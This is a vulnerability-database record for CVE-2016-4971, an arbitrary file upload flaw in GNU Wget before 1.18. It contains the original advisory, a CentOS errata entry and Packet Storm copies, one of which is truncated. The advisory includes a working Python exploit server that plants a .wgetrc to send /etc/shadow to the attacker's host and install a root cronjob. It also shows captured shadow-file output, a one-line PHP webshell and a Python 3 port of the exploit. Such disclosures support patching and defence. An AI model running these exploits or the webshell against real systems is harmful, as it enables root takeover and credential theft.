{"id": "1337DAY-ID-25433", "type": "zdt", "bulletinFamily": "exploit", "title": "GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution", "description": "Exploit for linux platform in category remote exploits", "published": "2016-07-06T00:00:00", "modified": "2016-07-06T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/25433", "reporter": "Dawid Golunski", "references": [], "cvelist": ["CVE-2016-4971"], "immutableFields": [], "lastseen": "2018-04-08T23:45:07", "viewCount": 20, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2016-720"]}, {"type": "archlinux", "idList": ["ASA-201606-19"]}, {"type": "centos", "idList": ["CESA-2016:2587"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0566"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99"]}, {"type": "cve", "idList": ["CVE-2016-4971"]}, {"type": "debian", "idList": ["DEBIAN:DLA-536-1:51225"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-4971"]}, {"type": "exploitdb", "idList": ["EDB-ID:40064", "EDB-ID:49815"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B7D0421EBA79F420787732ED0D8CDB1D"]}, {"type": "f5", "idList": ["F5:K55181425", "SOL55181425"]}, {"type": "fedora", "idList": ["FEDORA:4D3E16068708", "FEDORA:A52D660A96E6", "FEDORA:EE8A96078F47"]}, {"type": "freebsd", "idList": ["6DF56C60-3738-11E6-A671-60A44CE6887B"]}, {"type": "gentoo", "idList": ["GLSA-201610-11"]}, {"type": "ibm", "idList": ["3212B53427A43325550BE8D76D8414CB80F59E8C098469790D9938A354FC4F5A", "C57CB4EA12FFF65730206B718900EAEB6EFB3AEE18254CB007E3EAD2F81BB99B"]}, {"type": "mageia", "idList": ["MGASA-2016-0323"]}, {"type": "nessus", "idList": ["802003.PRM", "ALA_ALAS-2016-720.NASL", "CENTOS_RHSA-2016-2587.NASL", "DEBIAN_DLA-536.NASL", "EULEROS_SA-2016-1064.NASL", 
"EULEROS_SA-2019-1417.NASL", "FEDORA_2016-24135DFE43.NASL", "FEDORA_2016-2DB8CBC2FD.NASL", "FEDORA_2016-E14374472F.NASL", "FREEBSD_PKG_6DF56C60373811E6A67160A44CE6887B.NASL", "GENTOO_GLSA-201610-11.NASL", "OPENSUSE-2016-1067.NASL", "OPENSUSE-2016-973.NASL", "ORACLELINUX_ELSA-2016-2587.NASL", "PALO_ALTO_PAN-OS_7_0_15.NASL", "REDHAT-RHSA-2016-2587.NASL", "SLACKWARE_SSA_2016-165-01.NASL", "SL_20161103_WGET_ON_SL7_X.NASL", "SUSE_SU-2016-2226-1.NASL", "SUSE_SU-2016-2358-1.NASL", "UBUNTU_USN-3012-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106827", "OPENVAS:1361412562310120709", "OPENVAS:1361412562310808439", "OPENVAS:1361412562310808447", "OPENVAS:1361412562310808463", "OPENVAS:1361412562310842802", "OPENVAS:1361412562310871702", "OPENVAS:1361412562311220161064", "OPENVAS:1361412562311220191417"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2587"]}, {"type": "osv", "idList": ["OSV:DLA-536-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137795", "PACKETSTORM:162395"]}, {"type": "paloalto", "idList": ["PAN-SA-2017-0016"]}, {"type": "redhat", "idList": ["RHSA-2016:2587"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-4971"]}, {"type": "slackware", "idList": ["SSA-2016-165-01"]}, {"type": "ubuntu", "idList": ["USN-3012-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-4971"]}, {"type": "zdt", "idList": ["1337DAY-ID-36167"]}]}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2016-720"]}, {"type": "archlinux", "idList": ["ASA-201606-19"]}, {"type": "centos", "idList": ["CESA-2016:2587"]}, {"type": "cve", "idList": ["CVE-2016-4971"]}, {"type": "debian", "idList": ["DEBIAN:DLA-536-1:51225"]}, {"type": "exploitdb", "idList": ["EDB-ID:40064"]}, {"type": "f5", "idList": ["SOL55181425"]}, {"type": "fedora", "idList": ["FEDORA:EE8A96078F47"]}, {"type": "freebsd", "idList": ["6DF56C60-3738-11E6-A671-60A44CE6887B"]}, {"type": "ibm", "idList": ["C57CB4EA12FFF65730206B718900EAEB6EFB3AEE18254CB007E3EAD2F81BB99B"]}, {"type": "nessus", 
"idList": ["ALA_ALAS-2016-720.NASL", "DEBIAN_DLA-536.NASL", "FEDORA_2016-24135DFE43.NASL", "FEDORA_2016-2DB8CBC2FD.NASL", "FEDORA_2016-E14374472F.NASL", "FREEBSD_PKG_6DF56C60373811E6A67160A44CE6887B.NASL", "SLACKWARE_SSA_2016-165-01.NASL", "UBUNTU_USN-3012-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808439"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2587"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162395"]}, {"type": "redhat", "idList": ["RHSA-2016:2587"]}, {"type": "zdt", "idList": ["1337DAY-ID-36167"]}]}, "exploitation": null, "vulnersScore": -0.4}, "sourceHref": "https://0day.today/exploit/25433", "sourceData": "=============================================\r\n- Release date: 06.07.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-4971\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n \r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n \r\nhttps://www.gnu.org/software/wget/\r\n \r\n \r\nIII. 
INTRODUCTION\r\n-------------------------\r\n \r\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \r\ncompromised web server) can be tricked into saving an arbitrary remote file \r\nsupplied by an attacker, with arbitrary contents and filename under \r\nthe current directory and possibly other directories by writing to .wgetrc.\r\nDepending on the context in which wget is used, this can lead to remote code \r\nexecution and even root privilege escalation if wget is run via a root cronjob \r\nas is often the case in many web application deployments. \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n \r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nBecause of lack of sufficient controls in wget, when user downloads a file \r\nwith wget, such as:\r\n \r\nwget http://attackers-server/safe_file.txt\r\n \r\nan attacker who controls the server could make wget create an arbitrary file\r\nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \r\ncontaining FTP server reference in response to the victim's wget request. \r\n \r\nFor example, if the attacker's server replies with the following response:\r\n \r\nHTTP/1.1 302 Found\r\nCache-Control: private\r\nContent-Type: text/html; charset=UTF-8\r\nLocation: ftp://attackers-server/.bash_profile\r\nContent-Length: 262\r\nServer: Apache\r\n \r\nwget will automatically follow the redirect and will download a malicious\r\n.bash_profile file from a malicious FTP server. \r\nIt will fail to rename the file to the originally requested filename of \r\n'safe_file.txt' as it would normally do, in case of a redirect to another \r\nHTTP resource with a different name. 
\r\n \r\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\r\nwith an arbitrary filename to the victim's current directory.\r\n \r\nExecution flow:\r\n \r\nvictim@trusty:~$ wget --version | head -n1\r\nGNU Wget 1.17 built on linux-gnu.\r\n \r\nvictim@trusty:~$ pwd\r\n/home/victim\r\n \r\nvictim@trusty:~$ ls\r\nvictim@trusty:~$ \r\n \r\nvictim@trusty:~$ wget http://attackers-server/safe-file.txt\r\nResolving attackers-server... 192.168.57.1\r\nConnecting to attackers-server|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: ftp://192.168.57.1/.bash_profile [following]\r\n => \u2018.bash_profile\u2019\r\nConnecting to 192.168.57.1:21... connected.\r\nLogging in as anonymous ... Logged in!\r\n==> SYST ... done. ==> PWD ... done.\r\n==> TYPE I ... done. ==> CWD not needed.\r\n==> SIZE .bash_profile ... 55\r\n==> PASV ... done. ==> RETR .bash_profile ... done.\r\nLength: 55 (unauthoritative)\r\n \r\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\r\n \r\n2016-02-19 04:50:37 (1.27 MB/s) - \u2018.bash_profile\u2019 saved [55]\r\n \r\n \r\nvictim@trusty:~$ ls -l\r\ntotal 4\r\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\r\nvictim@trusty:~$ \r\n \r\n \r\nThis vulnerability will not work if extra options that force destination\r\nfilename are specified as a parameter. 
Such as: -O /tmp/output\r\nIt is however possible to exploit the issue with mirroring/recursive options\r\nenabled such as -r or -m.\r\n \r\nAnother limitation is that attacker exploiting this vulnerability can only\r\nupload his malicious file to the current directory from which wget was run, \r\nor to a directory specified by -P option (directory_prefix option).\r\nThis could however be enough to exploit wget run from home directory, or\r\nwithin web document root (in which case attacker could write malicious php files\r\nor .bash_profile files).\r\n \r\nThe current directory limitation could also be bypassed by uploading a .wgetrc \r\nconfig file if wget was run from a home directory.\r\n \r\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\r\nsettings such as destination directory for all downloaded files in future,\r\nas well as set a proxy setting to make future requests go through a malicious \r\nproxy server belonging to the attackers to which they could send further \r\nmalicious responses.\r\n \r\n \r\nHere is a set of Wget settings that can be helpful to an attacker:\r\n \r\ndir_prefix = string\r\n Top of directory tree\u2014the same as \u2018-P string\u2019.\r\n \r\npost_file = file\r\n Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u2018--post-file=file\u2019.\r\n \r\nrecursive = on/off\r\n Recursive on/off\u2014the same as \u2018-r\u2019.\r\n \r\ntimestamping = on/off\r\n Allows to overwrite existing files.\r\n \r\ncut_dirs = n\r\n Ignore n remote directory components. 
Allows attacker to create directories with wget (when combined with recursive option).\r\n \r\nhttp_proxy \r\n HTTP Proxy server\r\n \r\nhttps_proxy \r\n HTTPS Proxy server\r\n \r\noutput_document = file\r\n Set the output filename\u2014the same as \u2018-O file\u2019.\r\n \r\ninput = file\r\n Read the URLs from string, like \u2018-i file\u2019.\r\n \r\nmetalink-over-http\r\n Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \r\n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\r\n \r\n \r\n \r\nFull list of .wgetrc options can be found in:\r\n \r\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\r\n \r\n \r\n \r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n \r\n \r\n1) Cronjob with wget scenario\r\n \r\nOften wget is used inside cronjobs. By default cronjobs run within home \r\ndirectory of the cronjob owner.\r\nSuch wget cronjobs are commonly used with many applications used to download \r\nnew version of databases, requesting web scripts that perform scheduled tasks \r\nsuch as rebuilding indexes, cleaning caches etc. \r\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \r\nthe Internet with exploitable wget cronjobs:\r\n \r\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\r\nhttps://docs.moodle.org/2x/ca/Cron\r\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\r\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\r\n \r\nSuch setup could be abused by attackers to upload .bash_profile file through\r\nwget vulnerability and run commands in the context of the victim user upon \r\ntheir next log-in. 
\r\n \r\nAs cron runs periodically, attackers could also write out .wgetrc file in the \r\nfirst response and then write to /etc/cron.d/malicious-cron in the second. \r\nIf a cronjob is run by root, this would give them an almost instant root code \r\nexecution.\r\n \r\n \r\nIt is worth noting that if an attacker had access to local network they could \r\npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \r\nresponses to wget requests.\r\n \r\nThis issue could also be exploited by attackers who have already gained \r\naccess to the server through a web vulnerability to escalate their privileges. \r\nIn many cases the cron jobs (as in examples above) are set up to request \r\nvarious web scripts e.g: \r\nhttp://localhost/clean-cache.php \r\n \r\nIf the file was writable by apache, and attacker had access to www-data/apache \r\naccount, they could modify it to return malicious Location header and exploit \r\nroot cronjob that runs the wget request in order to escalate their privileges \r\nto root.\r\n \r\n \r\nFor simplicity we can assume that attacker already has control over the server \r\nthat the victim sends the request to with wget.\r\n \r\nThe root cronjob on the victim server may look as follows:\r\n \r\n[email\u00a0protected]:~# cat /etc/cron.d/update-database\r\n# Update database file every 2 minutes\r\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\r\n \r\n \r\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \r\nand starts an FTP server:\r\n \r\nattackers-server# mkdir /tmp/ftptest\r\nattackers-server# cd /tmp/ftptest\r\n \r\nattackers-server# cat <<_EOF_>.wgetrc\r\npost_file = /etc/shadow\r\noutput_document = /etc/cron.d/wget-root-shell\r\n_EOF_\r\n \r\nattackers-server# sudo pip install pyftpdlib\r\nattackers-server# python -m pyftpdlib -p21 -w\r\n \r\n \r\nAt this point attacker can start an HTTP server which will exploit wget by\r\nsending malicious redirects to the 
victim wget's requests:\r\n \r\n---[ wget-exploit.py ]---\r\n \r\n#!/usr/bin/env python\r\n \r\n#\r\n# Wget 1.18 < Arbitrary File Upload Exploit\r\n# Dawid Golunski\r\n# dawid( at )legalhackers.com\r\n#\r\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n#\r\n# CVE-2016-4971 \r\n#\r\n \r\nimport SimpleHTTPServer\r\nimport SocketServer\r\nimport socket;\r\n \r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # This takes care of sending .wgetrc\r\n \r\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n \r\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\r\n self.send_response(301)\r\n new_path = '%s'%('ftp://[email\u00a0protected]%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\r\n print \"Sending redirect to %s \\n\"%(new_path)\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n \r\n def do_POST(self):\r\n # In here we will receive extracted file and install a PoC cronjob\r\n \r\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n \r\n content_len = int(self.headers.getheader('content-length', 0))\r\n post_body = self.rfile.read(content_len)\r\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\r\n \r\n print \"Sending back a cronjob script as a thank-you for the file...\" \r\n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we 
injected in the GET first response)\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(ROOT_CRON)\r\n \r\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\r\n \r\n return\r\n \r\nHTTP_LISTEN_IP = '192.168.57.1'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.57.1'\r\nFTP_PORT = 21\r\n \r\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\r\n \r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n \r\nprint \"Ready? Is your FTP server running?\"\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\r\nelse:\r\n print \"FTP is down :( Exiting.\"\r\n exit(1)\r\n \r\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\r\n \r\nhandler.serve_forever()\r\n \r\n \r\n---[ eof ]---\r\n \r\n \r\n \r\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\r\nthe aforementioned cronjob with wget.\r\n \r\nThe output should look similar to:\r\n \r\n \r\n---[ wget-exploit.py output ]---\r\n \r\nattackers-server# python ./wget-exploit.py \r\n \r\nReady? Is your FTP server running?\r\nFTP found open on 192.168.57.1:21. Let's go then\r\n \r\nServing wget exploit on port 80...\r\n \r\n \r\nWe have a volunteer requesting /database.db by GET :)\r\n \r\nUploading .wgetrc via ftp redirect vuln. 
It should land in /root \r\n \r\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\r\nSending redirect to ftp://[email\u00a0protected]:21/.wgetrc \r\n \r\nWe have a volunteer requesting /database.db by POST :)\r\n \r\nReceived POST from wget, this should be the extracted /etc/shadow file: \r\n \r\n---[begin]---\r\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\r\ndaemon:*:16484:0:99999:7:::\r\nbin:*:16484:0:99999:7:::\r\nsys:*:16484:0:99999:7:::\r\nsync:*:16484:0:99999:7:::\r\ngames:*:16484:0:99999:7:::\r\nman:*:16484:0:99999:7:::\r\nlp:*:16484:0:99999:7:::\r\n...cut...\r\n---[eof]---\r\n \r\nSending back a cronjob script as a thank-you for the file...\r\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\r\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\r\n \r\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \r\n \r\n---[ output eof ]---\r\n \r\n \r\nAs we can see .wgetrc got uploaded by the exploit. 
It has set the post_file\r\nsetting to /etc/shadow.\r\nTherefore, on the next wget run, wget sent back shadow file to the attacker.\r\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \r\ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \r\nserver:\r\n \r\n \r\n[email\u00a0protected]:~# cat /etc/cron.d/wget-root-shell \r\n* * * * * root /usr/bin/id > /root/hacked-via-wget \r\n \r\n[email\u00a0protected]:~# cat /root/hacked-via-wget \r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\n \r\n2) PHP web application scenario\r\n \r\nIf wget is used within a PHP script e.g.:\r\n \r\n<?php\r\n \r\n// Update geoip data\r\n \r\n system(\"wget -N -P geoip http://attackers-host/goeip.db\"); \r\n \r\n?>\r\n \r\nAn attacker who manages to respond to the request could simply upload a PHP\r\nbackdoor of:\r\n \r\n<?php\r\n //webshell.php\r\n \r\n system($_GET['cmd']);\r\n?>\r\n \r\nby using the wget-exploit script described in example 1.\r\n \r\nAfter the upload they could simply execute the script and their shell\r\ncommand by a GET request to:\r\n \r\nhttp://victims-php-host/geoip/webshell.php?cmd=id\r\n \r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nAffected versions of wget that connect to untrusted (or compromised) web \r\nservers could be tricked into uploading a file under an arbitrary name, or\r\neven path (if wget is run from a home directory).\r\nDepending on the context in which wget is used, this could lead to\r\nuploading a web shell and granting the attacker remote access to the\r\nsystem, or privilege escalation. It could be possible for attackers to escalate\r\nto root user if wget is run via root cronjob as it is often the case in web \r\napplication deployments and is recommended in some guides on the Internet.\r\n \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n \r\n \r\nVII. 
SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nAll versions of Wget before the patched version of 1.18 are affected.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nUpdate to wget version 1.18 as advertised by the vendor at:\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nLinux distributions should update their wget packages. It is recommended\r\nto update wget manually if an updated package is not available for your\r\ndistribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com\r\n \r\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n \r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n \r\nhttp://www.ubuntu.com/usn/usn-3012-1/\r\n \r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\r\n \r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\r\n \r\nX. CREDITS\r\n-------------------------\r\n \r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n \r\n06.07.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n \r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-04-08] #", "_state": {"dependencies": 1659994789, "score": 1659995775}, "_internal": {"score_hash": "1365528452d12a78f70d6d561698aae3"}}
{"centos": [{"lastseen": "2023-01-01T05:08:49", "description": "**CentOS Errata and Security Advisory** CESA-2016:2587\n\n\nThe wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue. Upstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-cr-announce/2016-November/023137.html\n\n**Affected packages:**\nwget\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2016:2587", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-25T15:51:17", "type": "centos", "title": "wget security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-11-25T15:51:17", "id": "CESA-2016:2587", "href": "https://lists.centos.org/pipermail/centos-cr-announce/2016-November/023137.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-04-30T15:31:03", "description": "", "cvss3": {}, "published": "2021-04-30T00:00:00", "type": "packetstorm", "title": "GNU wget Arbitrary File Upload / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2021-04-30T00:00:00", "id": "PACKETSTORM:162395", "href": "https://packetstormsecurity.com/files/162395/GNU-wget-Arbitrary-File-Upload-Code-Execution.html", "sourceData": "`# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) \n# Original Exploit Author: Dawid Golunski \n# Exploit Author: liewehacksie \n# Version: GNU Wget < 1.18 \n# CVE: CVE-2016-4971 \n \nimport http.server \nimport socketserver \nimport socket \nimport sys \n \nclass wgetExploit(http.server.SimpleHTTPRequestHandler): \n \ndef do_GET(self): \n# This takes care of sending .wgetrc/.bash_profile/$file \n \nprint(\"We have a volunteer requesting \" + self.path + \" by GET :)\\n\") \nif \"Wget\" not in self.headers.get('User-Agent'): \nprint(\"But it's not a Wget :( \\n\") \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \nself.send_response(301) \nprint(\"Uploading \" + str(FILE) + \"via ftp redirect vuln. 
It should land in /home/ \\n\") \nnew_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE) \n \nprint(\"Sending redirect to %s \\n\"%(new_path)) \nself.send_header('Location', new_path) \nself.end_headers() \n \n \nHTTP_LISTEN_IP = '192.168.72.2' \nHTTP_LISTEN_PORT = 80 \nFTP_HOST = '192.168.72.4' \nFTP_PORT = 2121 \nFILE = '.bash_profile' \n \nhandler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) \n \nprint(\"Ready? Is your FTP server running?\") \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nresult = sock.connect_ex((FTP_HOST, FTP_PORT)) \nif result == 0: \nprint(\"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)) \nelse: \nprint(\"FTP is down :( Exiting.\") \nexit(1) \n \nprint(\"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT) \n \nhandler.serve_forever() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162395/wget-uploadexec.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2016-12-05T22:21:23", "description": "", "cvss3": {}, "published": "2016-07-06T00:00:00", "type": "packetstorm", "title": "GNU Wget Arbitrary File Upload / Potential Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-06T00:00:00", "id": "PACKETSTORM:137795", "href": "https://packetstormsecurity.com/files/137795/GNU-Wget-Arbitrary-File-Upload-Potential-Remote-Code-Execution.html", "sourceData": "`============================================= \n- Release date: 06.07.2016 \n- Discovered by: Dawid Golunski \n- Severity: High \n- CVE-2016-4971 \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nGNU Wget < 1.18 Arbitrary File Upload / Potential RCE \n \n \nII. BACKGROUND \n------------------------- \n \n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. 
\nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc. \n \nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP sites easy \n\" \n \nhttps://www.gnu.org/software/wget/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \ncompromised web server) can be tricked into saving an arbitrary remote file \nsupplied by an attacker, with arbitrary contents and filename under \nthe current directory and possibly other directories by writing to .wgetrc. \nDepending on the context in which wget is used, this can lead to remote code \nexecution and even root privilege escalation if wget is run via a root cronjob \nas is often the case in many web application deployments. \nThe vulnerability could also be exploited by well-positioned attackers within \nthe network who are able to intercept/modify the network traffic. \n \n \nIV. DESCRIPTION \n------------------------- \n \nBecause of lack of sufficient controls in wget, when user downloads a file \nwith wget, such as: \n \nwget http://attackers-server/safe_file.txt \n \nan attacker who controls the server could make wget create an arbitrary file \nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \ncontaining FTP server reference in response to the victim's wget request. \n \nFor example, if the attacker's server replies with the following response: \n \nHTTP/1.1 302 Found \nCache-Control: private \nContent-Type: text/html; charset=UTF-8 \nLocation: ftp://attackers-server/.bash_profile \nContent-Length: 262 \nServer: Apache \n \nwget will automatically follow the redirect and will download a malicious \n.bash_profile file from a malicious FTP server. 
\nIt will fail to rename the file to the originally requested filename of \n'safe_file.txt' as it would normally do, in case of a redirect to another \nHTTP resource with a different name. \n \nBecause of this vulnerability, an attacker is able to upload an arbitrary file \nwith an arbitrary filename to the victim's current directory. \n \nExecution flow: \n \nvictim@trusty:~$ wget --version | head -n1 \nGNU Wget 1.17 built on linux-gnu. \n \nvictim@trusty:~$ pwd \n/home/victim \n \nvictim@trusty:~$ ls \nvictim@trusty:~$ \n \nvictim@trusty:~$ wget http://attackers-server/safe-file.txt \nResolving attackers-server... 192.168.57.1 \nConnecting to attackers-server|192.168.57.1|:80... connected. \nHTTP request sent, awaiting response... 302 Found \nLocation: ftp://192.168.57.1/.bash_profile [following] \n=> \u2018.bash_profile\u2019 \nConnecting to 192.168.57.1:21... connected. \nLogging in as anonymous ... Logged in! \n==> SYST ... done. ==> PWD ... done. \n==> TYPE I ... done. ==> CWD not needed. \n==> SIZE .bash_profile ... 55 \n==> PASV ... done. ==> RETR .bash_profile ... done. 